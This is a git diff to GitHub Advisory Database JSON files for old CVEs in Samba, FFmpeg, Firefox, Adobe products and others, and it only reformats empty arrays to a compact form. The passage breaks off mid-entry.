b/advisories/unreviewed/2022/05/GHSA-5cxg-6999-xfwq/GHSA-5cxg-6999-xfwq.json index 8ed4f409217..57bb8a30b0b 100644 --- a/advisories/unreviewed/2022/05/GHSA-5cxg-6999-xfwq/GHSA-5cxg-6999-xfwq.json +++ b/advisories/unreviewed/2022/05/GHSA-5cxg-6999-xfwq/GHSA-5cxg-6999-xfwq.json @@ -7,12 +7,8 @@ "CVE-2011-2522" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allow remote attackers to hijack the authentication of administrators for requests that (1) shut down daemons, (2) start daemons, (3) add shares, (4) remove shares, (5) add printers, (6) remove printers, (7) add user accounts, or (8) remove user accounts, as demonstrated by certain start, stop, and restart parameters to the status program.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5f6m-6vj6-cf3c/GHSA-5f6m-6vj6-cf3c.json b/advisories/unreviewed/2022/05/GHSA-5f6m-6vj6-cf3c/GHSA-5f6m-6vj6-cf3c.json index 54ab318a947..3394d1da311 100644 --- a/advisories/unreviewed/2022/05/GHSA-5f6m-6vj6-cf3c/GHSA-5f6m-6vj6-cf3c.json +++ b/advisories/unreviewed/2022/05/GHSA-5f6m-6vj6-cf3c/GHSA-5f6m-6vj6-cf3c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5fxm-9pf8-gq25/GHSA-5fxm-9pf8-gq25.json b/advisories/unreviewed/2022/05/GHSA-5fxm-9pf8-gq25/GHSA-5fxm-9pf8-gq25.json index e7aee79c946..f0828d1f8ae 100644 --- a/advisories/unreviewed/2022/05/GHSA-5fxm-9pf8-gq25/GHSA-5fxm-9pf8-gq25.json +++ b/advisories/unreviewed/2022/05/GHSA-5fxm-9pf8-gq25/GHSA-5fxm-9pf8-gq25.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5g4x-4hfv-6v46/GHSA-5g4x-4hfv-6v46.json b/advisories/unreviewed/2022/05/GHSA-5g4x-4hfv-6v46/GHSA-5g4x-4hfv-6v46.json index 3ba45c0c97c..2cc7a7e4d37 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g4x-4hfv-6v46/GHSA-5g4x-4hfv-6v46.json +++ b/advisories/unreviewed/2022/05/GHSA-5g4x-4hfv-6v46/GHSA-5g4x-4hfv-6v46.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5j58-cmf8-pfrp/GHSA-5j58-cmf8-pfrp.json b/advisories/unreviewed/2022/05/GHSA-5j58-cmf8-pfrp/GHSA-5j58-cmf8-pfrp.json index 9e793c31371..b1f140c3df7 100644 --- a/advisories/unreviewed/2022/05/GHSA-5j58-cmf8-pfrp/GHSA-5j58-cmf8-pfrp.json +++ b/advisories/unreviewed/2022/05/GHSA-5j58-cmf8-pfrp/GHSA-5j58-cmf8-pfrp.json @@ -7,12 +7,8 @@ "CVE-2012-2783" ], "details": "Unspecified vulnerability in libavcodec/vp56.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.5, has unknown impact and attack vectors, related to \"freeing the returned frame.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5j5r-p4gq-qg52/GHSA-5j5r-p4gq-qg52.json b/advisories/unreviewed/2022/05/GHSA-5j5r-p4gq-qg52/GHSA-5j5r-p4gq-qg52.json index 3ec04c604c7..84405297edd 100644 --- a/advisories/unreviewed/2022/05/GHSA-5j5r-p4gq-qg52/GHSA-5j5r-p4gq-qg52.json +++ b/advisories/unreviewed/2022/05/GHSA-5j5r-p4gq-qg52/GHSA-5j5r-p4gq-qg52.json @@ -7,12 +7,8 @@ "CVE-2008-5430" ], "details": "Mozilla Thunderbird 2.0.14 does not properly handle (1) multipart/mixed e-mail messages with many MIME parts and possibly (2) e-mail messages with many \"Content-type: message/rfc822;\" headers, which might allow remote attackers to cause a denial of service (stack consumption or other resource consumption) via a large e-mail message, a related issue to CVE-2006-1173.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5j6j-m6fq-q2qp/GHSA-5j6j-m6fq-q2qp.json b/advisories/unreviewed/2022/05/GHSA-5j6j-m6fq-q2qp/GHSA-5j6j-m6fq-q2qp.json index 47bd449664c..0bbb25a3893 100644 --- a/advisories/unreviewed/2022/05/GHSA-5j6j-m6fq-q2qp/GHSA-5j6j-m6fq-q2qp.json +++ b/advisories/unreviewed/2022/05/GHSA-5j6j-m6fq-q2qp/GHSA-5j6j-m6fq-q2qp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5m3r-8c5c-3w2h/GHSA-5m3r-8c5c-3w2h.json b/advisories/unreviewed/2022/05/GHSA-5m3r-8c5c-3w2h/GHSA-5m3r-8c5c-3w2h.json index f142682f4cf..ceef5a6d6d1 100644 --- a/advisories/unreviewed/2022/05/GHSA-5m3r-8c5c-3w2h/GHSA-5m3r-8c5c-3w2h.json +++ b/advisories/unreviewed/2022/05/GHSA-5m3r-8c5c-3w2h/GHSA-5m3r-8c5c-3w2h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5pcm-5j39-vg9p/GHSA-5pcm-5j39-vg9p.json b/advisories/unreviewed/2022/05/GHSA-5pcm-5j39-vg9p/GHSA-5pcm-5j39-vg9p.json index 34219524d31..97e3a33be1b 100644 --- a/advisories/unreviewed/2022/05/GHSA-5pcm-5j39-vg9p/GHSA-5pcm-5j39-vg9p.json +++ b/advisories/unreviewed/2022/05/GHSA-5pcm-5j39-vg9p/GHSA-5pcm-5j39-vg9p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5qcq-wvmf-f6h5/GHSA-5qcq-wvmf-f6h5.json b/advisories/unreviewed/2022/05/GHSA-5qcq-wvmf-f6h5/GHSA-5qcq-wvmf-f6h5.json index fa7972b8979..c61f813965b 100644 --- a/advisories/unreviewed/2022/05/GHSA-5qcq-wvmf-f6h5/GHSA-5qcq-wvmf-f6h5.json +++ b/advisories/unreviewed/2022/05/GHSA-5qcq-wvmf-f6h5/GHSA-5qcq-wvmf-f6h5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5qh6-rg6v-wmmc/GHSA-5qh6-rg6v-wmmc.json b/advisories/unreviewed/2022/05/GHSA-5qh6-rg6v-wmmc/GHSA-5qh6-rg6v-wmmc.json index f490a646f5c..c211cc07f56 100644 --- a/advisories/unreviewed/2022/05/GHSA-5qh6-rg6v-wmmc/GHSA-5qh6-rg6v-wmmc.json +++ b/advisories/unreviewed/2022/05/GHSA-5qh6-rg6v-wmmc/GHSA-5qh6-rg6v-wmmc.json @@ -7,12 +7,8 @@ "CVE-2013-5593" ], "details": "The SELECT element implementation in Mozilla Firefox before 25.0, Firefox ESR 24.x before 24.1, Thunderbird before 24.1, and SeaMonkey before 2.22 does not properly restrict the nature or placement of HTML within a dropdown menu, which allows remote attackers to spoof the address bar or conduct clickjacking attacks via vectors that trigger navigation off of a page containing this element.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5r2p-gx4c-fqr4/GHSA-5r2p-gx4c-fqr4.json b/advisories/unreviewed/2022/05/GHSA-5r2p-gx4c-fqr4/GHSA-5r2p-gx4c-fqr4.json index 2d4e8f04d3b..8b1108cb741 100644 --- a/advisories/unreviewed/2022/05/GHSA-5r2p-gx4c-fqr4/GHSA-5r2p-gx4c-fqr4.json +++ b/advisories/unreviewed/2022/05/GHSA-5r2p-gx4c-fqr4/GHSA-5r2p-gx4c-fqr4.json @@ -7,12 +7,8 @@ "CVE-2011-2425" ], "details": "Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2417.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5w8h-hpxm-mp5f/GHSA-5w8h-hpxm-mp5f.json b/advisories/unreviewed/2022/05/GHSA-5w8h-hpxm-mp5f/GHSA-5w8h-hpxm-mp5f.json index c24d4f94f83..52f65e0f738 100644 --- a/advisories/unreviewed/2022/05/GHSA-5w8h-hpxm-mp5f/GHSA-5w8h-hpxm-mp5f.json +++ b/advisories/unreviewed/2022/05/GHSA-5w8h-hpxm-mp5f/GHSA-5w8h-hpxm-mp5f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5wjr-vj25-wfpw/GHSA-5wjr-vj25-wfpw.json b/advisories/unreviewed/2022/05/GHSA-5wjr-vj25-wfpw/GHSA-5wjr-vj25-wfpw.json index 553373587db..e1d0454faf3 100644 --- a/advisories/unreviewed/2022/05/GHSA-5wjr-vj25-wfpw/GHSA-5wjr-vj25-wfpw.json +++ b/advisories/unreviewed/2022/05/GHSA-5wjr-vj25-wfpw/GHSA-5wjr-vj25-wfpw.json @@ -7,12 +7,8 @@ "CVE-2010-2205" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, access uninitialized memory, which allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5x6f-2xcq-3hwq/GHSA-5x6f-2xcq-3hwq.json b/advisories/unreviewed/2022/05/GHSA-5x6f-2xcq-3hwq/GHSA-5x6f-2xcq-3hwq.json index b052499ce21..5bd2c9740be 100644 --- a/advisories/unreviewed/2022/05/GHSA-5x6f-2xcq-3hwq/GHSA-5x6f-2xcq-3hwq.json +++ b/advisories/unreviewed/2022/05/GHSA-5x6f-2xcq-3hwq/GHSA-5x6f-2xcq-3hwq.json @@ -7,12 +7,8 @@ "CVE-2013-5601" ], "details": "Use-after-free vulnerability in the nsEventListenerManager::SetEventHandler function in Mozilla Firefox before 25.0, Firefox ESR 17.x before 17.0.10 and 24.x before 24.1, Thunderbird before 24.1, Thunderbird ESR 17.x before 17.0.10, and SeaMonkey before 2.22 allows remote attackers to execute arbitrary code via vectors related to a memory allocation through the garbage collection (GC) API.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-62rf-g5f7-frmw/GHSA-62rf-g5f7-frmw.json b/advisories/unreviewed/2022/05/GHSA-62rf-g5f7-frmw/GHSA-62rf-g5f7-frmw.json index 8dc71b619ea..bf22ab1ad70 100644 --- a/advisories/unreviewed/2022/05/GHSA-62rf-g5f7-frmw/GHSA-62rf-g5f7-frmw.json +++ b/advisories/unreviewed/2022/05/GHSA-62rf-g5f7-frmw/GHSA-62rf-g5f7-frmw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-62wj-rrx7-2qv2/GHSA-62wj-rrx7-2qv2.json b/advisories/unreviewed/2022/05/GHSA-62wj-rrx7-2qv2/GHSA-62wj-rrx7-2qv2.json index 2691f35dbff..f518e482cc8 100644 --- a/advisories/unreviewed/2022/05/GHSA-62wj-rrx7-2qv2/GHSA-62wj-rrx7-2qv2.json +++ b/advisories/unreviewed/2022/05/GHSA-62wj-rrx7-2qv2/GHSA-62wj-rrx7-2qv2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-638j-3c7c-6fjw/GHSA-638j-3c7c-6fjw.json b/advisories/unreviewed/2022/05/GHSA-638j-3c7c-6fjw/GHSA-638j-3c7c-6fjw.json index f666ebd474b..9e767f48934 100644 --- a/advisories/unreviewed/2022/05/GHSA-638j-3c7c-6fjw/GHSA-638j-3c7c-6fjw.json +++ b/advisories/unreviewed/2022/05/GHSA-638j-3c7c-6fjw/GHSA-638j-3c7c-6fjw.json @@ -7,12 +7,8 @@ "CVE-2008-5882" ], "details": "SQL injection vulnerability in login.asp in Citrix Application Gateway - Broadcast Server (BCS) before 6.1, as used by Avaya AG250 - Broadcast Server before 2.0 and possibly other products, allows remote attackers to execute arbitrary SQL commands via the txtUID parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-63gw-hff3-vv3w/GHSA-63gw-hff3-vv3w.json b/advisories/unreviewed/2022/05/GHSA-63gw-hff3-vv3w/GHSA-63gw-hff3-vv3w.json index 18f1f81c731..667bab17e6f 100644 --- a/advisories/unreviewed/2022/05/GHSA-63gw-hff3-vv3w/GHSA-63gw-hff3-vv3w.json +++ b/advisories/unreviewed/2022/05/GHSA-63gw-hff3-vv3w/GHSA-63gw-hff3-vv3w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-63pm-cg8g-8gfx/GHSA-63pm-cg8g-8gfx.json b/advisories/unreviewed/2022/05/GHSA-63pm-cg8g-8gfx/GHSA-63pm-cg8g-8gfx.json index 3e3bd0c28b3..e8b820138e5 100644 --- a/advisories/unreviewed/2022/05/GHSA-63pm-cg8g-8gfx/GHSA-63pm-cg8g-8gfx.json +++ b/advisories/unreviewed/2022/05/GHSA-63pm-cg8g-8gfx/GHSA-63pm-cg8g-8gfx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-63wp-qg59-9g55/GHSA-63wp-qg59-9g55.json b/advisories/unreviewed/2022/05/GHSA-63wp-qg59-9g55/GHSA-63wp-qg59-9g55.json index ef315e251fa..30679dd931a 100644 --- a/advisories/unreviewed/2022/05/GHSA-63wp-qg59-9g55/GHSA-63wp-qg59-9g55.json +++ b/advisories/unreviewed/2022/05/GHSA-63wp-qg59-9g55/GHSA-63wp-qg59-9g55.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-64jr-c5c9-jh2h/GHSA-64jr-c5c9-jh2h.json b/advisories/unreviewed/2022/05/GHSA-64jr-c5c9-jh2h/GHSA-64jr-c5c9-jh2h.json index 9d3cbb50c27..8b74537d796 100644 --- a/advisories/unreviewed/2022/05/GHSA-64jr-c5c9-jh2h/GHSA-64jr-c5c9-jh2h.json +++ b/advisories/unreviewed/2022/05/GHSA-64jr-c5c9-jh2h/GHSA-64jr-c5c9-jh2h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-64pp-ww3p-f3q4/GHSA-64pp-ww3p-f3q4.json b/advisories/unreviewed/2022/05/GHSA-64pp-ww3p-f3q4/GHSA-64pp-ww3p-f3q4.json index eb3a1cb0517..043f95cbfe1 100644 --- a/advisories/unreviewed/2022/05/GHSA-64pp-ww3p-f3q4/GHSA-64pp-ww3p-f3q4.json +++ b/advisories/unreviewed/2022/05/GHSA-64pp-ww3p-f3q4/GHSA-64pp-ww3p-f3q4.json @@ -7,12 +7,8 @@ "CVE-2011-3992" ], "details": "Buffer overflow in the SSH server functionality on the D-Link DES-3800 with firmware before 4.50B052, DWL-2100AP with firmware before 2.50RC548, and DWL-3200AP with firmware before 2.55RC549 allows remote attackers to execute arbitrary code or cause a denial of service via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-64w8-g7qm-5gc2/GHSA-64w8-g7qm-5gc2.json b/advisories/unreviewed/2022/05/GHSA-64w8-g7qm-5gc2/GHSA-64w8-g7qm-5gc2.json index 78ec2dbafb2..e0fd74e4d4b 100644 --- a/advisories/unreviewed/2022/05/GHSA-64w8-g7qm-5gc2/GHSA-64w8-g7qm-5gc2.json +++ b/advisories/unreviewed/2022/05/GHSA-64w8-g7qm-5gc2/GHSA-64w8-g7qm-5gc2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6528-m2x9-48f7/GHSA-6528-m2x9-48f7.json b/advisories/unreviewed/2022/05/GHSA-6528-m2x9-48f7/GHSA-6528-m2x9-48f7.json index c0fc586a690..9a40737c1ee 100644 --- a/advisories/unreviewed/2022/05/GHSA-6528-m2x9-48f7/GHSA-6528-m2x9-48f7.json +++ b/advisories/unreviewed/2022/05/GHSA-6528-m2x9-48f7/GHSA-6528-m2x9-48f7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-65g6-r5w2-5m6f/GHSA-65g6-r5w2-5m6f.json b/advisories/unreviewed/2022/05/GHSA-65g6-r5w2-5m6f/GHSA-65g6-r5w2-5m6f.json index d9d1c24215b..c91137f8af5 100644 --- a/advisories/unreviewed/2022/05/GHSA-65g6-r5w2-5m6f/GHSA-65g6-r5w2-5m6f.json +++ b/advisories/unreviewed/2022/05/GHSA-65g6-r5w2-5m6f/GHSA-65g6-r5w2-5m6f.json @@ -7,12 +7,8 @@ "CVE-2010-3556" ], "details": "Unspecified vulnerability in the 2D component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -116,9 +112,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-65hv-rxc9-c75q/GHSA-65hv-rxc9-c75q.json b/advisories/unreviewed/2022/05/GHSA-65hv-rxc9-c75q/GHSA-65hv-rxc9-c75q.json index ff6947fdf9e..500fe8fda39 100644 --- a/advisories/unreviewed/2022/05/GHSA-65hv-rxc9-c75q/GHSA-65hv-rxc9-c75q.json +++ b/advisories/unreviewed/2022/05/GHSA-65hv-rxc9-c75q/GHSA-65hv-rxc9-c75q.json @@ -7,12 +7,8 @@ "CVE-2008-4812" ], "details": "Array index error in Adobe Reader and Acrobat, and the Explorer extension (aka AcroRd32Info), 8.1.2, 8.1.1, and earlier allows remote attackers to execute arbitrary code via a crafted PDF document that triggers an out-of-bounds write, related to parsing of Type 1 fonts.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-65jm-x345-vj99/GHSA-65jm-x345-vj99.json b/advisories/unreviewed/2022/05/GHSA-65jm-x345-vj99/GHSA-65jm-x345-vj99.json index c9e548593ed..833a547291a 100644 --- a/advisories/unreviewed/2022/05/GHSA-65jm-x345-vj99/GHSA-65jm-x345-vj99.json +++ b/advisories/unreviewed/2022/05/GHSA-65jm-x345-vj99/GHSA-65jm-x345-vj99.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6669-2rgv-wqcp/GHSA-6669-2rgv-wqcp.json b/advisories/unreviewed/2022/05/GHSA-6669-2rgv-wqcp/GHSA-6669-2rgv-wqcp.json index e95b5787697..d7508f3d81d 100644 --- a/advisories/unreviewed/2022/05/GHSA-6669-2rgv-wqcp/GHSA-6669-2rgv-wqcp.json +++ b/advisories/unreviewed/2022/05/GHSA-6669-2rgv-wqcp/GHSA-6669-2rgv-wqcp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-669r-5j22-g48w/GHSA-669r-5j22-g48w.json b/advisories/unreviewed/2022/05/GHSA-669r-5j22-g48w/GHSA-669r-5j22-g48w.json index b24b2c46299..462aa1cdc98 100644 --- a/advisories/unreviewed/2022/05/GHSA-669r-5j22-g48w/GHSA-669r-5j22-g48w.json +++ b/advisories/unreviewed/2022/05/GHSA-669r-5j22-g48w/GHSA-669r-5j22-g48w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-66cj-3q7r-633r/GHSA-66cj-3q7r-633r.json b/advisories/unreviewed/2022/05/GHSA-66cj-3q7r-633r/GHSA-66cj-3q7r-633r.json index 0bc9119b899..7440da8338f 100644 --- a/advisories/unreviewed/2022/05/GHSA-66cj-3q7r-633r/GHSA-66cj-3q7r-633r.json +++ b/advisories/unreviewed/2022/05/GHSA-66cj-3q7r-633r/GHSA-66cj-3q7r-633r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-66p2-mghc-64q3/GHSA-66p2-mghc-64q3.json b/advisories/unreviewed/2022/05/GHSA-66p2-mghc-64q3/GHSA-66p2-mghc-64q3.json index af7bb7cf4c6..b7db6ce22dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-66p2-mghc-64q3/GHSA-66p2-mghc-64q3.json +++ b/advisories/unreviewed/2022/05/GHSA-66p2-mghc-64q3/GHSA-66p2-mghc-64q3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-686m-6jxh-96vw/GHSA-686m-6jxh-96vw.json b/advisories/unreviewed/2022/05/GHSA-686m-6jxh-96vw/GHSA-686m-6jxh-96vw.json index 37ff7f54594..e5995cf6358 100644 --- a/advisories/unreviewed/2022/05/GHSA-686m-6jxh-96vw/GHSA-686m-6jxh-96vw.json +++ b/advisories/unreviewed/2022/05/GHSA-686m-6jxh-96vw/GHSA-686m-6jxh-96vw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-69v5-jqwj-h2vx/GHSA-69v5-jqwj-h2vx.json b/advisories/unreviewed/2022/05/GHSA-69v5-jqwj-h2vx/GHSA-69v5-jqwj-h2vx.json index 5086afea8fd..5d4f78b3b5f 100644 --- a/advisories/unreviewed/2022/05/GHSA-69v5-jqwj-h2vx/GHSA-69v5-jqwj-h2vx.json +++ b/advisories/unreviewed/2022/05/GHSA-69v5-jqwj-h2vx/GHSA-69v5-jqwj-h2vx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6c24-f7cf-r9w9/GHSA-6c24-f7cf-r9w9.json b/advisories/unreviewed/2022/05/GHSA-6c24-f7cf-r9w9/GHSA-6c24-f7cf-r9w9.json index 26d24017517..5b633d39d45 100644 --- a/advisories/unreviewed/2022/05/GHSA-6c24-f7cf-r9w9/GHSA-6c24-f7cf-r9w9.json +++ b/advisories/unreviewed/2022/05/GHSA-6c24-f7cf-r9w9/GHSA-6c24-f7cf-r9w9.json @@ -7,12 +7,8 @@ "CVE-2012-0855" ], "details": "Heap-based buffer overflow in the get_sot function in the J2K decoder (j2k.c) in libavcodec in FFmpeg before 0.9.1 allows remote attackers to cause a denial of service (application crash) via unspecified vectors related to the curtileno variable.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6cfg-p9mx-f38q/GHSA-6cfg-p9mx-f38q.json b/advisories/unreviewed/2022/05/GHSA-6cfg-p9mx-f38q/GHSA-6cfg-p9mx-f38q.json index 27ee126bcd4..6df90ffb231 100644 --- a/advisories/unreviewed/2022/05/GHSA-6cfg-p9mx-f38q/GHSA-6cfg-p9mx-f38q.json +++ b/advisories/unreviewed/2022/05/GHSA-6cfg-p9mx-f38q/GHSA-6cfg-p9mx-f38q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6cpv-jrx7-frg6/GHSA-6cpv-jrx7-frg6.json b/advisories/unreviewed/2022/05/GHSA-6cpv-jrx7-frg6/GHSA-6cpv-jrx7-frg6.json index 8709c8c207b..23a47ec443a 100644 --- a/advisories/unreviewed/2022/05/GHSA-6cpv-jrx7-frg6/GHSA-6cpv-jrx7-frg6.json +++ b/advisories/unreviewed/2022/05/GHSA-6cpv-jrx7-frg6/GHSA-6cpv-jrx7-frg6.json @@ -7,12 +7,8 @@ "CVE-2011-2161" ], "details": "The ape_read_header function in ape.c in libavformat in FFmpeg before 0.5.4, as used in MPlayer, VideoLAN VLC media player, and other products, allows remote attackers to cause a denial of service (application crash) via an APE (aka Monkey's Audio) file that contains a header but no frames.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + 